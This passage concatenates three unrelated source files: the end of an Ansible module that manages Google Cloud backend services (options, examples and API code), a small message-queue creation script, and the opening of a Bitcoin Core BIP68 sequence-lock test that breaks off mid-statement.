- For CONNECTION mode, either maxConnections or maxConnectionsPerEndpoint
must be set.
required: false
type: int
version_added: '2.9'
max_rate:
description:
- The max requests per second (RPS) of the group.
- Can be used with either RATE or UTILIZATION balancing modes, but required
if RATE mode. For RATE mode, either maxRate or one of maxRatePerInstance
or maxRatePerEndpoint, as appropriate for group type, must be set.
required: false
type: int
max_rate_per_instance:
description:
- The max requests per second (RPS) that a single backend instance can handle.
This is used to calculate the capacity of the group. Can be used in either
balancing mode. For RATE mode, either maxRate or maxRatePerInstance must
be set.
required: false
type: str
max_rate_per_endpoint:
description:
- The max requests per second (RPS) that a single backend network endpoint
can handle. This is used to calculate the capacity of the group. Can be
used in either balancing mode. For RATE mode, either maxRate or maxRatePerEndpoint
must be set.
required: false
type: str
version_added: '2.9'
max_utilization:
description:
- Used when balancingMode is UTILIZATION. This ratio defines the CPU utilization
target for the group. The default is 0.8. Valid range is [0.0, 1.0].
required: false
default: '0.8'
type: str
cdn_policy:
description:
- Cloud CDN configuration for this BackendService.
required: false
type: dict
suboptions:
cache_key_policy:
description:
- The CacheKeyPolicy for this CdnPolicy.
required: false
type: dict
suboptions:
include_host:
description:
- If true requests to different hosts will be cached separately.
required: false
type: bool
include_protocol:
description:
- If true, http and https requests will be cached separately.
required: false
type: bool
include_query_string:
description:
- If true, include query string parameters in the cache key according
to query_string_whitelist and query_string_blacklist. If neither is
set, the entire query string will be included.
- If false, the query string will be excluded from the cache key entirely.
required: false
type: bool
query_string_blacklist:
description:
- Names of query string parameters to exclude in cache keys.
- All other parameters will be included. Either specify query_string_whitelist
or query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
required: false
type: list
query_string_whitelist:
description:
- Names of query string parameters to include in cache keys.
- All other parameters will be excluded. Either specify query_string_whitelist
or query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
required: false
type: list
signed_url_cache_max_age_sec:
description:
- Maximum number of seconds the response to a signed URL request will be considered
fresh, defaults to 1hr (3600s). After this time period, the response will
be revalidated before being served.
- 'When serving responses to signed URL requests, Cloud CDN will internally
behave as though all responses from this backend had a "Cache-Control: public,
max-age=[TTL]" header, regardless of any existing Cache-Control header.
The actual headers served in responses will not be altered.'
required: false
default: '3600'
type: int
version_added: '2.8'
connection_draining:
description:
- Settings for connection draining .
required: false
type: dict
suboptions:
draining_timeout_sec:
description:
- Time for which instance will be drained (not accept new connections, but
still work to finish started).
required: false
default: '300'
type: int
description:
description:
- An optional description of this resource.
required: false
type: str
enable_cdn:
description:
- If true, enable Cloud CDN for this BackendService.
required: false
type: bool
health_checks:
description:
- The set of URLs to the HttpHealthCheck or HttpsHealthCheck resource for health
checking this BackendService. Currently at most one health check can be specified,
and a health check is required.
- For internal load balancing, a URL to a HealthCheck resource must be specified
instead.
required: true
type: list
iap:
description:
- Settings for enabling Cloud Identity Aware Proxy.
required: false
type: dict
version_added: '2.7'
suboptions:
enabled:
description:
- Enables IAP.
required: false
type: bool
oauth2_client_id:
description:
- OAuth2 Client ID for IAP .
required: true
type: str
oauth2_client_secret:
description:
- OAuth2 Client Secret for IAP .
required: true
type: str
load_balancing_scheme:
description:
- Indicates whether the backend service will be used with internal or external
load balancing. A backend service created for one type of load balancing cannot
be used with the other. Must be `EXTERNAL` or `INTERNAL_SELF_MANAGED` for a
global backend service. Defaults to `EXTERNAL`.
- 'Some valid choices include: "EXTERNAL", "INTERNAL_SELF_MANAGED"'
required: false
default: EXTERNAL
type: str
version_added: '2.7'
name:
description:
- Name of the resource. Provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
required: true
type: str
port_name:
description:
- Name of backend port. The same name should appear in the instance groups referenced
by this service. Required when the load balancing scheme is EXTERNAL.
required: false
type: str
protocol:
description:
- The protocol this BackendService uses to communicate with backends.
- 'Possible values are HTTP, HTTPS, HTTP2, TCP, and SSL. The default is HTTP.
**NOTE**: HTTP2 is only valid for beta HTTP/2 load balancer types and may result
in errors if used with the GA API.'
- 'Some valid choices include: "HTTP", "HTTPS", "HTTP2", "TCP", "SSL"'
required: false
type: str
security_policy:
description:
- The security policy associated with this backend service.
required: false
type: str
version_added: '2.8'
session_affinity:
description:
- Type of session affinity to use. The default is NONE. Session affinity is not
applicable if the protocol is UDP.
- 'Some valid choices include: "NONE", "CLIENT_IP", "CLIENT_IP_PORT_PROTO", "CLIENT_IP_PROTO",
"GENERATED_COOKIE", "HEADER_FIELD", "HTTP_COOKIE"'
required: false
type: str
timeout_sec:
description:
- How many seconds to wait for the backend before considering it a failed request.
Default is 30 seconds. Valid range is [1, 86400].
required: false
type: int
aliases:
- timeout_seconds
project:
description:
- The Google Cloud Platform project to use.
type: str
auth_kind:
description:
- The type of credential used.
type: str
required: true
choices:
- application
- machineaccount
- serviceaccount
service_account_contents:
description:
- The contents of a Service Account JSON file, either in a dictionary or as a
JSON string that represents it.
type: jsonarg
service_account_file:
description:
- The path of a Service Account JSON file if serviceaccount is selected as type.
type: path
service_account_email:
description:
- An optional service account email address if machineaccount is selected and
the user does not wish to use the default email.
type: str
scopes:
description:
- Array of scopes to be used
type: list
env_type:
description:
- Specifies which Ansible environment you're running this module within.
- This should not be set unless you know what you're doing.
- This only alters the User Agent string for any API requests.
type: str
notes:
- 'API Reference: U(https://cloud.google.com/compute/docs/reference/v1/backendServices)'
- 'Official Documentation: U(https://cloud.google.com/compute/docs/load-balancing/http/backend-service)'
- for authentication, you can set service_account_file using the c(gcp_service_account_file)
env variable.
- for authentication, you can set service_account_contents using the c(GCP_SERVICE_ACCOUNT_CONTENTS)
env variable.
- For authentication, you can set service_account_email using the C(GCP_SERVICE_ACCOUNT_EMAIL)
env variable.
- For authentication, you can set auth_kind using the C(GCP_AUTH_KIND) env variable.
- For authentication, you can set scopes using the C(GCP_SCOPES) env variable.
- Environment variables values will only be used if the playbook values are not set.
- The I(service_account_email) and I(service_account_file) options are mutually exclusive.
'''
EXAMPLES = '''
- name: create a instance group
gcp_compute_instance_group:
name: instancegroup-backendservice
zone: us-central1-a
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
state: present
register: instancegroup
- name: create a HTTP health check
gcp_compute_http_health_check:
name: httphealthcheck-backendservice
healthy_threshold: 10
port: 8080
timeout_sec: 2
unhealthy_threshold: 5
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
state: present
register: healthcheck
- name: create a backend service
gcp_compute_backend_service:
name: test_object
backends:
- group: "{{ instancegroup.selfLink }}"
health_checks:
- "{{ healthcheck.selfLink }}"
enable_cdn: 'true'
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
state: present
'''
RETURN = '''
affinityCookieTtlSec:
description:
- Lifetime of cookies in seconds if session_affinity is GENERATED_COOKIE. If set
to 0, the cookie is non-persistent and lasts only until the end of the browser
session (or equivalent). The maximum allowed value for TTL is one day.
- When the load balancing scheme is INTERNAL, this field is not used.
returned: success
type: int
backends:
description:
- The set of backends that serve this BackendService.
returned: success
type: complex
contains:
balancingMode:
description:
- Specifies the balancing mode for this backend.
- For global HTTP(S) or TCP/SSL load balancing, the default is UTILIZATION.
Valid values are UTILIZATION, RATE (for HTTP(S)) and CONNECTION (for TCP/SSL).
returned: success
type: str
capacityScaler:
description:
- A multiplier applied to the group's maximum servicing capacity (based on UTILIZATION,
RATE or CONNECTION).
- Default value is 1, which means the group will serve up to 100% of its configured
capacity (depending on balancingMode). A setting of 0 means the group is completely
drained, offering 0% of its available Capacity. Valid range is [0.0,1.0].
returned: success
type: str
description:
description:
- An optional description of this resource.
- Provide this property when you create the resource.
returned: success
type: str
group:
description:
- The fully-qualified URL of an Instance Group or Network Endpoint Group resource.
In case of instance group this defines the list of instances that serve traffic.
Member virtual machine instances from each instance group must live in the
same zone as the instance group itself. No two backends in a backend service
are allowed to use same Instance Group resource.
- For Network Endpoint Groups this defines list of endpoints. All endpoints
of Network Endpoint Group must be hosted on instances located in the same
zone as the Network Endpoint Group.
- Backend service can not contain mix of Instance Group and Network Endpoint
Group backends.
- Note that you must specify an Instance Group or Network Endpoint Group resource
using the fully-qualified URL, rather than a partial URL.
returned: success
type: str
maxConnections:
description:
- The max number of simultaneous connections for the group. Can be used with
either CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or one of maxConnectionsPerInstance
or maxConnectionsPerEndpoint, as appropriate for group type, must be set.
returned: success
type: int
maxConnectionsPerInstance:
description:
- The max number of simultaneous connections that a single backend instance
can handle. This is used to calculate the capacity of the group. Can be used
in either CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerInstance must
be set.
returned: success
type: int
maxConnectionsPerEndpoint:
description:
- The max number of simultaneous connections that a single backend network endpoint
can handle. This is used to calculate the capacity of the group. Can be used
in either CONNECTION or UTILIZATION balancing modes.
- For CONNECTION mode, either maxConnections or maxConnectionsPerEndpoint must
be set.
returned: success
type: int
maxRate:
description:
- The max requests per second (RPS) of the group.
- Can be used with either RATE or UTILIZATION balancing modes, but required
if RATE mode. For RATE mode, either maxRate or one of maxRatePerInstance or
maxRatePerEndpoint, as appropriate for group type, must be set.
returned: success
type: int
maxRatePerInstance:
description:
- The max requests per second (RPS) that a single backend instance can handle.
This is used to calculate the capacity of the group. Can be used in either
balancing mode. For RATE mode, either maxRate or maxRatePerInstance must be
set.
returned: success
type: str
maxRatePerEndpoint:
description:
- The max requests per second (RPS) that a single backend network endpoint can
handle. This is used to calculate the capacity of the group. Can be used in
either balancing mode. For RATE mode, either maxRate or maxRatePerEndpoint
must be set.
returned: success
type: str
maxUtilization:
description:
- Used when balancingMode is UTILIZATION. This ratio defines the CPU utilization
target for the group. The default is 0.8. Valid range is [0.0, 1.0].
returned: success
type: str
cdnPolicy:
description:
- Cloud CDN configuration for this BackendService.
returned: success
type: complex
contains:
cacheKeyPolicy:
description:
- The CacheKeyPolicy for this CdnPolicy.
returned: success
type: complex
contains:
includeHost:
description:
- If true requests to different hosts will be cached separately.
returned: success
type: bool
includeProtocol:
description:
- If true, http and https requests will be cached separately.
returned: success
type: bool
includeQueryString:
description:
- If true, include query string parameters in the cache key according to
query_string_whitelist and query_string_blacklist. If neither is set,
the entire query string will be included.
- If false, the query string will be excluded from the cache key entirely.
returned: success
type: bool
queryStringBlacklist:
description:
- Names of query string parameters to exclude in cache keys.
- All other parameters will be included. Either specify query_string_whitelist
or query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
returned: success
type: list
queryStringWhitelist:
description:
- Names of query string parameters to include in cache keys.
- All other parameters will be excluded. Either specify query_string_whitelist
or query_string_blacklist, not both.
- "'&' and '=' will be percent encoded and not treated as delimiters."
returned: success
type: list
signedUrlCacheMaxAgeSec:
description:
- Maximum number of seconds the response to a signed URL request will be considered
fresh, defaults to 1hr (3600s). After this time period, the response will
be revalidated before being served.
- 'When serving responses to signed URL requests, Cloud CDN will internally
behave as though all responses from this backend had a "Cache-Control: public,
max-age=[TTL]" header, regardless of any existing Cache-Control header. The
actual headers served in responses will not be altered.'
returned: success
type: int
connectionDraining:
description:
- Settings for connection draining .
returned: success
type: complex
contains:
drainingTimeoutSec:
description:
- Time for which instance will be drained (not accept new connections, but still
work to finish started).
returned: success
type: int
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
fingerprint:
description:
- Fingerprint of this resource. A hash of the contents stored in this object. This
field is used in optimistic locking.
returned: success
type: str
description:
description:
- An optional description of this resource.
returned: success
type: str
enableCDN:
description:
- If true, enable Cloud CDN for this BackendService.
returned: success
type: bool
healthChecks:
description:
- The set of URLs to the HttpHealthCheck or HttpsHealthCheck resource for health
checking this BackendService. Currently at most one health check can be specified,
and a health check is required.
- For internal load balancing, a URL to a HealthCheck resource must be specified
instead.
returned: success
type: list
id:
description:
- The unique identifier for the resource.
returned: success
type: int
iap:
description:
- Settings for enabling Cloud Identity Aware Proxy.
returned: success
type: complex
contains:
enabled:
description:
- Enables IAP.
returned: success
type: bool
oauth2ClientId:
description:
- OAuth2 Client ID for IAP .
returned: success
type: str
oauth2ClientSecret:
description:
- OAuth2 Client Secret for IAP .
returned: success
type: str
oauth2ClientSecretSha256:
description:
- OAuth2 Client Secret SHA-256 for IAP .
returned: success
type: str
loadBalancingScheme:
description:
- Indicates whether the backend service will be used with internal or external load
balancing. A backend service created for one type of load balancing cannot be
used with the other. Must be `EXTERNAL` or `INTERNAL_SELF_MANAGED` for a global
backend service. Defaults to `EXTERNAL`.
returned: success
type: str
name:
description:
- Name of the resource. Provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
portName:
description:
- Name of backend port. The same name should appear in the instance groups referenced
by this service. Required when the load balancing scheme is EXTERNAL.
returned: success
type: str
protocol:
description:
- The protocol this BackendService uses to communicate with backends.
- 'Possible values are HTTP, HTTPS, HTTP2, TCP, and SSL. The default is HTTP. **NOTE**:
HTTP2 is only valid for beta HTTP/2 load balancer types and may result in errors
if used with the GA API.'
returned: success
type: str
securityPolicy:
description:
- The security policy associated with this backend service.
returned: success
type: str
sessionAffinity:
description:
- Type of session affinity to use. The default is NONE. Session affinity is not
applicable if the protocol is UDP.
returned: success
type: str
timeoutSec:
description:
- How many seconds to wait for the backend before considering it a failed request.
Default is 30 seconds. Valid range is [1, 86400].
returned: success
type: int
'''
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict
import json
import time
def main():
"""Main function"""
module = GcpModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
affinity_cookie_ttl_sec=dict(type='int'),
backends=dict(
type='list',
elements='dict',
options=dict(
balancing_mode=dict(default='UTILIZATION', type='str'),
capacity_scaler=dict(default=1.0, type='str'),
description=dict(type='str'),
group=dict(type='str'),
max_connections=dict(type='int'),
max_connections_per_instance=dict(type='int'),
max_connections_per_endpoint=dict(type='int'),
max_rate=dict(type='int'),
max_rate_per_instance=dict(type='str'),
max_rate_per_endpoint=dict(type='str'),
max_utilization=dict(default=0.8, type='str'),
),
),
cdn_policy=dict(
type='dict',
options=dict(
cache_key_policy=dict(
type='dict',
options=dict(
include_host=dict(type='bool'),
include_protocol=dict(type='bool'),
include_query_string=dict(type='bool'),
query_string_blacklist=dict(type='list', elements='str'),
query_string_whitelist=dict(type='list', elements='str'),
),
),
signed_url_cache_max_age_sec=dict(default=3600, type='int'),
),
),
connection_draining=dict(type='dict', options=dict(draining_timeout_sec=dict(default=300, type='int'))),
description=dict(type='str'),
enable_cdn=dict(type='bool'),
health_checks=dict(required=True, type='list', elements='str'),
iap=dict(
type='dict',
options=dict(enabled=dict(type='bool'), oauth2_client_id=dict(required=True, type='str'), oauth2_client_secret=dict(required=True, type='str')),
),
load_balancing_scheme=dict(default='EXTERNAL', type='str'),
name=dict(required=True, type='str'),
port_name=dict(type='str'),
protocol=dict(type='str'),
security_policy=dict(type='str'),
session_affinity=dict(type='str'),
timeout_sec=dict(type='int', aliases=['timeout_seconds']),
)
)
if not module.params['scopes']:
module.params['scopes'] = ['https://www.googleapis.com/auth/compute']
state = module.params['state']
kind = 'compute#backendService'
fetch = fetch_resource(module, self_link(module), kind)
changed = False
if fetch:
if state == 'present':
if is_different(module, fetch):
update(module, self_link(module), kind, fetch)
fetch = fetch_resource(module, self_link(module), kind)
changed = True
else:
delete(module, self_link(module), kind)
fetch = {}
changed = True
else:
if state == 'present':
fetch = create(module, collection(module), kind)
changed = True
else:
fetch = {}
fetch.update({'changed': changed})
module.exit_json(**fetch)
def create(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.post(link, resource_to_request(module)))
def update(module, link, kind, fetch):
update_fields(module, resource_to_request(module), response_to_hash(module, fetch))
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.put(link, resource_to_request(module)))
def update_fields(module, request, response):
if response.get('securityPolicy') != request.get('securityPolicy'):
security_policy_update(module, request, response)
def security_policy_update(module, request, response):
auth = GcpSession(module, 'compute')
auth.post(
''.join(["https://www.googleapis.com/compute/v1/", "projects/{project}/global/backendServices/{name}/setSecurityPolicy"]).format(**module.params),
{u'securityPolicy': module.params.get('security_policy')},
)
def delete(module, link, kind):
auth = GcpSession(module, 'compute')
return wait_for_operation(module, auth.delete(link))
def resource_to_request(module):
request = {
u'kind': 'compute#backendService',
u'affinityCookieTtlSec': module.params.get('affinity_cookie_ttl_sec'),
u'backends': BackendServiceBackendsArray(module.params.get('backends', []), module).to_request(),
u'cdnPolicy': BackendServiceCdnpolicy(module.params.get('cdn_policy', {}), module).to_request(),
u'connectionDraining': BackendServiceConnectiondraining(module.params.get('connection_draining', {}), module).to_request(),
u'description': module.params.get('description'),
u'enableCDN': module.params.get('enable_cdn'),
u'healthChecks': module.params.get('health_checks'),
u'iap': BackendServiceIap(module.params.get('iap', {}), module).to_request(),
u'loadBalancingScheme': module.params.get('load_balancing_scheme'),
u'name': module.params.get('name'),
u'portName': module.params.get('port_name'),
u'protocol': module.params.get('protocol'),
u'securityPolicy': module.params.get('security_policy'),
u'sessionAffinity': module.params.get('session_affinity'),
u'timeoutSec': module.params.get('timeout_sec'),
}
return_vals = {}
for k, v in request.items():
if v or v is False:
return_vals[k] = v
return return_vals
def fetch_resource(module, link, kind, allow_not_found=True):
auth = GcpSession(module, 'compute')
return return_if_object(module, auth.get(link), kind, allow_not_found)
def self_link(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/global/backendServices/{name}".format(**module.params)
def collection(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/global/backendServices".format(**module.params)
def return_if_object(module, response, kind, allow_not_found=False):
# If not found, return nothing.
if allow_not_found and response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError):
module.fail_json(msg="Invalid JSON response with error: %s" % response.text)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
return result
def is_different(module, response):
request = resource_to_request(module)
response = response_to_hash(module, response)
# Remove all output-only from response.
response_vals = {}
for k, v in response.items():
if k in request:
response_vals[k] = v
request_vals = {}
for k, v in request.items():
if k in response:
request_vals[k] = v
return GcpRequest(request_vals) != GcpRequest(response_vals)
def response_to_hash(module, response):
return {
u'affinityCookieTtlSec': response.get(u'affinityCookieTtlSec'),
u'backends': BackendServiceBackendsArray(response.get(u'backends', []), module).from_response(),
u'cdnPolicy': BackendServiceCdnpolicy(response.get(u'cdnPolicy', {}), module).from_response(),
u'connectionDraining': BackendServiceConnectiondraining(response.get(u'connectionDraining', {}), module).from_response(),
u'creationTimestamp': response.get(u'creationTimestamp'),
u'fingerprint': response.get(u'fingerprint'),
u'description': response.get(u'description'),
u'enableCDN': response.get(u'enableCDN'),
u'healthChecks': response.get(u'healthChecks'),
u'id': response.get(u'id'),
u'iap': BackendServiceIap(response.get(u'iap', {}), module).from_response(),
u'loadBalancingScheme': module.params.get('load_balancing_scheme'),
u'name': module.params.get('name'),
u'portName': response.get(u'portName'),
u'protocol': response.get(u'protocol'),
u'securityPolicy': response.get(u'securityPolicy'),
u'sessionAffinity': response.get(u'sessionAffinity'),
u'timeoutSec': response.get(u'timeoutSec'),
}
def async_op_url(module, extra_data=None):
if extra_data is None:
extra_data = {}
url = "https://www.googleapis.com/compute/v1/projects/{project}/global/operations/{op_id}"
combined = extra_data.copy()
combined.update(module.params)
return url.format(**combined)
def wait_for_operation(module, response):
op_result = return_if_object(module, response, 'compute#operation')
if op_result is None:
return {}
status = navigate_hash(op_result, ['status'])
wait_done = wait_for_completion(status, op_result, module)
return fetch_resource(module, navigate_hash(wait_done, ['targetLink']), 'compute#backendService')
def wait_for_completion(status, op_result, module):
op_id = navigate_hash(op_result, ['name'])
op_uri = async_op_url(module, {'op_id': op_id})
while status != 'DONE':
raise_if_errors(op_result, ['error', 'errors'], module)
time.sleep(1.0)
op_result = fetch_resource(module, op_uri, 'compute#operation', False)
status = navigate_hash(op_result, ['status'])
return op_result
def raise_if_errors(response, err_path, module):
errors = navigate_hash(response, err_path)
if errors is not None:
module.fail_json(msg=errors)
class BackendServiceBackendsArray(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = []
def to_request(self):
items = []
for item in self.request:
items.append(self._request_for_item(item))
return items
def from_response(self):
items = []
for item in self.request:
items.append(self._response_from_item(item))
return items
def _request_for_item(self, item):
return remove_nones_from_dict(
{
u'balancingMode': item.get('balancing_mode'),
u'capacityScaler': item.get('capacity_scaler'),
u'description': item.get('description'),
u'group': item.get('group'),
u'maxConnections': item.get('max_connections'),
u'maxConnectionsPerInstance': item.get('max_connections_per_instance'),
u'maxConnectionsPerEndpoint': item.get('max_connections_per_endpoint'),
u'maxRate': item.get('max_rate'),
u'maxRatePerInstance': item.get('max_rate_per_instance'),
u'maxRatePerEndpoint': item.get('max_rate_per_endpoint'),
u'maxUtilization': item.get('max_utilization'),
}
)
def _response_from_item(self, item):
return remove_nones_from_dict(
{
u'balancingMode': item.get(u'balancingMode'),
u'capacityScaler': item.get(u'capacityScaler'),
u'description': item.get(u'description'),
u'group': item.get(u'group'),
u'maxConnections': item.get(u'maxConnections'),
u'maxConnectionsPerInstance': item.get(u'maxConnectionsPerInstance'),
u'maxConnectionsPerEndpoint': item.get(u'maxConnectionsPerEndpoint'),
u'maxRate': item.get(u'maxRate'),
u'maxRatePerInstance': item.get(u'maxRatePerInstance'),
u'maxRatePerEndpoint': item.get(u'maxRatePerEndpoint'),
u'maxUtilization': item.get(u'maxUtilization'),
}
)
class BackendServiceCdnpolicy(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{
u'cacheKeyPolicy': BackendServiceCachekeypolicy(self.request.get('cache_key_policy', {}), self.module).to_request(),
u'signedUrlCacheMaxAgeSec': self.request.get('signed_url_cache_max_age_sec'),
}
)
def from_response(self):
return remove_nones_from_dict(
{
u'cacheKeyPolicy': BackendServiceCachekeypolicy(self.request.get(u'cacheKeyPolicy', {}), self.module).from_response(),
u'signedUrlCacheMaxAgeSec': self.request.get(u'signedUrlCacheMaxAgeSec'),
}
)
class BackendServiceCachekeypolicy(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{
u'includeHost': self.request.get('include_host'),
u'includeProtocol': self.request.get('include_protocol'),
u'includeQueryString': self.request.get('include_query_string'),
u'queryStringBlacklist': self.request.get('query_string_blacklist'),
u'queryStringWhitelist': self.request.get('query_string_whitelist'),
}
)
def from_response(self):
return remove_nones_from_dict(
{
u'includeHost': self.request.get(u'includeHost'),
u'includeProtocol': self.request.get(u'includeProtocol'),
u'includeQueryString': self.request.get(u'includeQueryString'),
u'queryStringBlacklist': self.request.get(u'queryStringBlacklist'),
u'queryStringWhitelist': self.request.get(u'queryStringWhitelist'),
}
)
class BackendServiceConnectiondraining(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({u'drainingTimeoutSec': self.request.get('draining_timeout_sec')})
def from_response(self):
return remove_nones_from_dict({u'drainingTimeoutSec': self.request.get(u'drainingTimeoutSec')})
class BackendServiceIap(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{
u'enabled': self.request.get('enabled'),
u'oauth2ClientId': self.request.get('oauth2_client_id'),
u'oauth2ClientSecret': self.request.get('oauth2_client_secret'),
}
)
def from_response(self):
return remove_nones_from_dict(
{
u'enabled': self.request.get(u'enabled'),
u'oauth2ClientId': self.request.get(u'oauth2ClientId'),
u'oauth2ClientSecret': self.request.get(u'oauth2ClientSecret'),
}
)
if __name__ == '__main__':
main()
|
import os
from watermark.config import config as conf
from watermark import connect
config_name = os.getenv('WM_CONFIG_ENV') or 'default'
config = conf[config_name]()
conn = connect.get_connection(config)
conn.message.create_queue(name=config.NAME)
print("{name} queue created".format(name=config.NAME))
|
"""Test BIP68 implementation."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.blocktools import *
SEQUENCE_LOCKTIME_DISABLE_FLAG = (1<<31)
SEQUENCE_LOCKTIME_TYPE_FLAG = (1<<22) # this means use time (0 means height)
SEQUENCE_LOCKTIME_GRANULARITY = 9 # this is a bit-shift
SEQUENCE_LOCKTIME_MASK = 0x0000ffff
NOT_FINAL_ERROR = "non-BIP68-final (code 64)"
class BIP68Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.extra_args = [[], ["-acceptnonstdtxn=0"]]
def run_test(self):
self.relayfee = self.nodes[0].getnetworkinfo()["relayfee"]
# Generate some coins
self.nodes[0].generate(110)
self.log.info("Running test disable flag")
self.test_disable_flag()
self.log.info("Running test sequence-lock-confirmed-inputs")
self.test_sequence_lock_confirmed_inputs()
self.log.info("Running test sequence-lock-unconfirmed-inputs")
self.test_sequence_lock_unconfirmed_inputs()
self.log.info("Running test BIP68 not consensus before versionbits activation")
self.test_bip68_not_consensus()
self.log.info("Activating BIP68 (and 112/113)")
self.activateCSV()
self.log.info("Verifying nVersion=2 transactions are standard.")
self.log.info("Note that nVersion=2 transactions are always standard (independent of BIP68 activation status).")
self.test_version2_relay()
self.log.info("Passed")
# Test that BIP68 is not in effect if tx version is 1, or if
# the first sequence bit is set.
def test_disable_flag(self):
# Create some unconfirmed inputs
new_addr = self.nodes[0].getnewaddress()
self.nodes[0].sendtoaddress(new_addr, 2) # send 2 BTC
utxos = self.nodes[0].listunspent(0, 0)
assert(len(utxos) > 0)
utxo = utxos[0]
tx1 = CTransaction()
value = int(satoshi_round(utxo["amount"] - self.relayfee)*COIN)
# Check that the disable flag disables relative locktime.
# If sequence locks were used, this would require 1 block for the
# input to mature.
sequence_value = SEQUENCE_LOCKTIME_DISABLE_FLAG | 1
tx1.vin = [CTxIn(COutPoint(int(utxo["txid"], 16), utxo["vout"]), nSequence=sequence_value)]
tx1.vout = [CTxOut(value, CScript([b'a']))]
tx1_signed = self.nodes[0].signrawtransactionwithwallet(ToHex(tx1))["hex"]
tx1_id = self.nodes[0].sendrawtransaction(tx1_signed)
tx1_id = int(tx1_id, 16)
# This transaction will enable sequence-locks, so this transaction should
# fail
tx2 = CTransaction()
tx2.nVersion = 2
sequence_value = sequence_value & 0x7fffffff
tx2.vin = [CTxIn(COutPoint(tx1_id, 0), nSequence=sequence_value)]
tx2.vout = [CTxOut(int(value-self.relayfee*COIN), CScript([b'a']))]
tx2.rehash()
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, ToHex(tx2))
# Setting the version back down to 1 should disable the sequence lock,
# so this should be accepted.
tx2.nVersion = 1
self.nodes[0].sendrawtransaction(ToHex(tx2))
# Calculate the median time past of a prior block ("confirmations" before
# the current tip).
def get_median_time_past(self, confirmations):
block_hash = self.nodes[0].getblockhash(self.nodes[0].getblockcount()-confirmations)
return self.nodes[0].getblockheader(block_hash)["mediantime"]
# Test that sequence locks are respected for transactions spending confirmed inputs.
def test_sequence_lock_confirmed_inputs(self):
# Create lots of confirmed utxos, and use them to generate lots of random
# transactions.
max_outputs = 50
addresses = []
while len(addresses) < max_outputs:
addresses.append(self.nodes[0].getnewaddress())
while len(self.nodes[0].listunspent()) < 200:
import random
random.shuffle(addresses)
num_outputs = random.randint(1, max_outputs)
outputs = {}
for i in range(num_outputs):
outputs[addresses[i]] = random.randint(1, 20)*0.01
self.nodes[0].sendmany("", outputs)
self.nodes[0].generate(1)
utxos = self.nodes[0].listunspent()
# Try creating a lot of random transactions.
# Each time, choose a random number of inputs, and randomly set
# some of those inputs to be sequence locked (and randomly choose
# between height/time locking). Small random chance of making the locks
# all pass.
for i in range(400):
# Randomly choose up to 10 inputs
num_inputs = random.randint(1, 10)
random.shuffle(utxos)
# Track whether any sequence locks used should fail
should_pass = True
# Track whether this transaction was built with sequence locks
using_sequence_locks = False
tx = CTransaction()
tx.nVersion = 2
value = 0
for j in range(num_inputs):
sequence_value = 0xfffffffe # this disables sequence locks
# 50% chance we enable sequence locks
if random.randint(0,1):
using_sequence_locks = True
# 10% of the time, make the input sequence value pass
input_will_pass = (random.randint(1,10) == 1)
sequence_value = utxos[j]["confirmations"]
if not input_will_pass:
sequence_value += 1
should_pass = False
# Figure out what the median-time-past was for the confirmed input
# Note that if an input has N confirmations, we're going back N blocks
# from the tip so that we're looking up MTP of the block
# PRIOR to the one the input appears in, as per the BIP68 spec.
orig_time = self.get_median_time_past(utxos[j]["confirmations"])
cur_time = self.get_median_time_past(0) # MTP of the tip
# can only timelock this input if it's not too old -- otherwise use height
can_time_lock = True
if ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY) >= SEQUENCE_LOCKTIME_MASK:
can_time_lock = False
# if time-lockable, then 50% chance we make this a time lock
if random.randint(0,1) and can_time_lock:
# Find first time-lock value that fails, or latest one that succeeds
time_delta = sequence_value << SEQUENCE_LOCKTIME_GRANULARITY
if input_will_pass and time_delta > cur_time - orig_time:
